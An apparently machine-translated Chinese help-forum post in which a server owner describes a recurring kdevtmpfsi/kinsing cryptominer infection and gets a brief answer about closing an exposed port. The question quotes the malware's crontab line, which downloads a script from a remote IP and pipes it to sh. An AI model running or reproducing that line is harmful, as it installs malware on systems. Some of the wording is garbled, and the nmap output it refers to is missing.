我刚刚创建的服务器被感染了韋夫特姆夫西恶意软件。我看到很多文章建议如何永久删除此恶意软件,但没有一篇对我有用。在尝试了一些方法并“清理”系统后,恶意软件在几个小时后又回来了,并且占用了 100% 的 CPU。
我读到,在大多数情况下,服务器是通过 Redis/Docker 感染的。我不使用 Redis。
在服务器的/tmp目录中,我有该文件/tmp/kdevtmpfsi/在一些教程中,我看到我应该运行chmod 000 /tmp/kdevtmpfsi以终止对该文件的访问 - 但即使我尝试以 root 身份运行该命令,我也会得到不允许操作。
如果我运行crontab -l,我会看到:
* * * * * wget -q -O - http://185.122.204.197/sc.sh | sh > /dev/null 2>&1
我明明从crontab中删除了这一行,但是几分钟后,它又回来了。
我还尝试运行nmap列出开放端口并得到以下结果:
从底部数第二行显示kinsing- 我不确定它是怎么到那里的。应该删除它吗?
如何删除韋夫特姆夫西2024 年从服务器撤离?
答案1
已经 4 天了(敲木头),病毒还没有出现。
就我的情况而言,我已向公众开放了一个端口。关闭此端口并通过 nginx 路由流量后,病毒似乎消失了。